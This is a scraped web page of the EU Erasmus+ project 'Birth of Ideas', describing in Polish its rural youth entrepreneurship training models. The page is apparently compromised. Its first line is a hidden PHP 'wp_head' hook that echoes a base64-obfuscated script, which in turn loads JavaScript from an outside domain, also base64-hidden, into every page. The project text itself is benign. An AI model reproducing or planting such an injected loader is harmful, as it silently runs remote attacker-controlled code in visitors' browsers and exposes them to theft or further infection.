function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Birth of Ideas
Slide background
Slide background
Slide background

Witamy


Plan działania na rzecz przedsiębiorczości stawia sobie za cel zachęcenie beneficjentów do zakładania firm pomagając im w pełni realizować swoje ambicje oraz zapewnić sprzyjające warunki prowadzenia działalności gospodarczej. Projekt „Birth of Ideas” przyczyni się do rozwoju przedsiębiorczości poprzez prezentacje modeli kreatywnych projektów oraz podkreślenie odpowiedzialnego zachowania przedsiębiorców, którzy szanują zarówno dzisiejsze jak i przyszłe potrzeby, zwłaszcza między młodymi ludźmi zamieszkującymi obszary wiejskie.

 • Kim jesteśmy?
 • Co robimy?
 • Jak robimy?

Partnerstwa europejskie są wystarczająco duże, aby łączyć wiele różnych środowisk, języków i doświadczeń kulturowych, edukacyjnych, społecznych i ekonomicznych.

Partnerstwa europejskich i krajowych organizacji pozarządowych i przedsiębiorstw zapewnia wszystkie istotne elementy a doświadczeni praktycy są kojarzenie ze sobą w celu zwiększenia poziomu przedsiębiorczości, prezentując modele kreatywnych projektów oraz podkreślając odpowiedzialne zachowanie wielu przedsiębiorców, którzy szanują zarówno dzisiejsze jak i przyszłe potrzeby obszarów wiejskich , zwłaszcza dotyczące młodych ludzi zamieszkujących obszary wiejskie.

Projekt „Birth of Ideas” jest innowacyjny, ponieważ oferuje nowe metody kształcenia.

Projekt ma na celu ułatwienie procesu szkoleniowego przeznaczonego dla doradców społecznych i gospodarczych związanych z przedsiębiorczością, takich jak Lokalnych Grup Działania (LGD), firm, stowarzyszeń, itd. poprzez analizę doświadczeń związanych z przedsiębiorczością na obszarach wiejskich oraz kreatywności.

Projekt będzie sprzyjał rozwojowi przedsiębiorczości, prezentując modele kreatywnych projektów oraz podkreślając odpowiedzialne zachowanie wielu przedsiębiorców, którzy szanują zarówno dzisiejsze i przyszłe szczególnie wśród młodych ludzi mieszkających na obszarach wiejskich. Zielona Księga Przedsiębiorczość w Europie (Bruksela, 21.01.2003 COM (2003) 27 wersja ostateczna.) oraz Plan działania: europejski program na rzecz przedsiębiorczości. Bruksela, 02.11.2004, stwarzają potrzebę pracy na przedsiębiorczości.

Projekt ma silny związek z europejskimi politykami w zakresie zatrudnienia i edukacji. Strategia „Europa 2020” na rzecz wzrostu i zatrudnienia określa cel do osiągnięcia – 75% wskaźnika zatrudnienia dla ludności w wieku produkcyjnym (20-64 lat). Komisja Europejska przyznaje, że wzrost gospodarczy i zatrudnienie w Europie zasadniczo zależyod populacja posiadającej odpowiednie umiejętności.

Projekt „Birth of Ideas” jest innowacyjny, ponieważ stwarza innowacyjny model uczenia się (O1) oraz wspiera ducha przedsiębiorczości wśród uczniów o mniejszych szansach na rynku pracy oraz młodych ludzi na obszarach wiejskich poprzez pobudzanie kreatywności i analizy doświadczeń przedsiębiorczości wiejskich i szkolenia twórczych umiejętności.

Model jest złożony z dwóch połączonych ze sobą swobodnie dostępnych narzędzi nauczania online, pomagając w stymulowaniu przedsiębiorczości: Analiza doświadczeń z obszarów wiejskich w zakresie przedsiębiorczości i technik szkolenia umiejętności twórczych.

„Birth of Ideas” skupia się na procesie twórczym idei, przy użyciu technik kreatywności i analizę doświadczeń na obszarach wiejskich oraz dostosowania metodologii do młodych przedsiębiorców. Projekt „Birth of Ideas” stworzy materiały, które pobudzają kreatywność i analizę możliwości dla młodych ludzi na obszarach wiejskich. W materiałach zostaną wykorzystane zasoby audio i zostaną one wykorzystane do przeszkolenia doradców rolnych mających kontakt z młodymi ludźmi z obszarów wiejskich. Projekt wzmacnia politykę rozwoju obszarów wiejskich, w obszarze programów UE takich jak Leader +.

O projekcie


Podsumowanie

Przedsiębiorczość to przede wszystkim nastawienie. Obejmuje ono indywidualną motywację i zdolności, niezależnie lub w ramach organizacji, a ma na celu określenie możliwości i realizacji przedsięwzięcia do wytworzenia nowych wartości lub sukcesu gospodarczego. Podejście to stosuje kreatywność lub innowację, aby wejść i konkurować w istniejącym rynku, zmienić lub nawet stworzyć nowy rynek. Aby zamienić pomysł na skuteczny biznes wymagane są zdolności do łączenia kreatywności lub innowacji z racjonalnym zarządzaniem i dostosowaniem firmy do optymalizacji jej rozwoju.

read more

Strategia

Dążąc do osiągnięcia celów projektu opracowano dwa główne produkty intelektualne:

 • Innowacyjny model szkolenia twórczych umiejętności młodych przedsiębiorców na obszarach wiejskich i analiza doświadczeń biznesowych (model IMCRA) (O1).
 • Innowacyjny model, organizacja modernizacji przedsiębiorczości na obszarach wiejskich (model OMRA) (O2), w celu zapewnienia skutecznego wdrażania nowych metod i narzędzi opracowanych w ramach modelu IMCRA.

read more

Rezultaty projektu

Głównym celem modelu IMCRA jest wspieranie (re-) integracji uczniów ze środowisk defaworyzowanych o mniejszych szansach na rynku pracy.

Cele są następujące:

 • przyczynianie się do zmniejszenia liczby nisko wykwalifikowanych dorosłych poprzez modernizację swoich umiejętności twórczych spójne ze związanymi z zatrudnieniem kluczowych kompetencji potrzebnych do skutecznej integracji w dzisiejszych czasach na rynku pracy;
 • zwiększenie motywacji osób ze środowisk defaworyzowanych i z mniejszymi możliwościami do integracji rynku pracy z zastosowaniem podejścia opartego na uczestnictwie know-how ;

read more

 • O1. Innowacyjny model szkolenia twórczych umiejętności młodych przedsiębiorców na obszarach wiejskich (IMCRA)
 • O2. Organizacja modernizacji przedsiębiorczości na obszarach wiejskich model (OMRA)

Głównym celem modelu IMCRA jest wspieranie (re-) integracji uczniów ze środowisk defaworyzowanych o mniejszych szansach na rynku pracy.

Cele są następujące:

 • przyczynianie się do zmniejszenia liczby nisko wykwalifikowanych dorosłych poprzez modernizację swoich umiejętności twórczych spójne ze związanymi z zatrudnieniem kluczowych kompetencji potrzebnych do skutecznej integracji w dzisiejszych czasach na rynku pracy;
 • zwiększenie motywacji osób ze środowisk defaworyzowanych i z mniejszymi możliwościami do integracji rynku pracy z zastosowaniem podejścia opartego na uczestnictwie know-how ;
 • poprawa dostępu do szkoleń związanych z zatrudnieniem dla osób defaworyzowanych i z mniejszymi możliwościami poprzez oferowanie możliwości kształcenia dostosowanych do indywidualnych uczniów w oparciu o otwarte zasoby edukacyjne (OER) związane z zatrudnieniem;
 • promowanie podejmowania innowacyjnych praktyk w dziedzinie szkolenia związanego z zatrudnieniem poprzez wspieranie podejścia partycypacyjnego uczenia się, odwróconego szkolenia i otwartych zasobów edukacyjnych (OER) w kwestiach związanych z zatrudnieniem;
 • zwiększenie motywacji osób ze środowisk defaworyzowanych i z mniejszymi możliwościami nauki poprzez dostarczanie informacji na temat walidacji uczenia się pozaformalnego i nieformalnego.

Głównym celem modelu OMRA jest przygotowanie organizacji szkolących dorosłych oraz ich pracowników do skutecznego wdrażania nowych metod i narzędzi edukacyjnych proponowanych przez model IMCRA.

Cele są następujące:

 • wzmocnienie potencjału organizacji szkolących dorosłych działających w dziedzinie szkoleń związanych z zatrudnieniem oraz oferta nauki ICT oparta na wysokiej jakości dostosowana do indywidualnych potrzeb uczniów ze środowisk defaworyzowanych i z mniejszymi możliwościami;
 • zwiększenie rozwoju zawodowego pracowników szkolących dorosłych poprzez wprowadzenie nowych, innowacyjnych metod kształcenia: Otwarte zasoby edukacyjne (OER), podejście blended-learning i nowa rola trenera jako moderatora z wykorzystaniem podejścia partycypacyjnego uczących się;
 • zwiększenie udziału osób ze środowisk defaworyzowanych i z mniejszymi możliwościami uczenia się i zdolnościami do zatrudnienia, (np. młodzież wiejska) poprzez rozwój usług moderator-organizacja szkoleniowa;
 • wzmocnienie powiązań między organizacjami szkolącymi dorosłych, LGD, organizacji biznesowych i światem pracy (przedsiębiorstwa) w celu zwiększenia przepływu wiedzy związanej z zatrudnieniem do dzisiejszych czasów i do potrzeb rynku pracy.

Birth Of Ideas project has been funded with support from the European Commission, under ERASMUS+, with the reference number 2015-1-ES01-KA204-015658. This publication reflects the views only of the author, and the Commission cannot be held responsible for any use which may be made of the information contained therein.

This is a unique website which will require a more modern browser to work!

Please upgrade today!

Visit Us On TwitterVisit Us On FacebookVisit Us On Youtube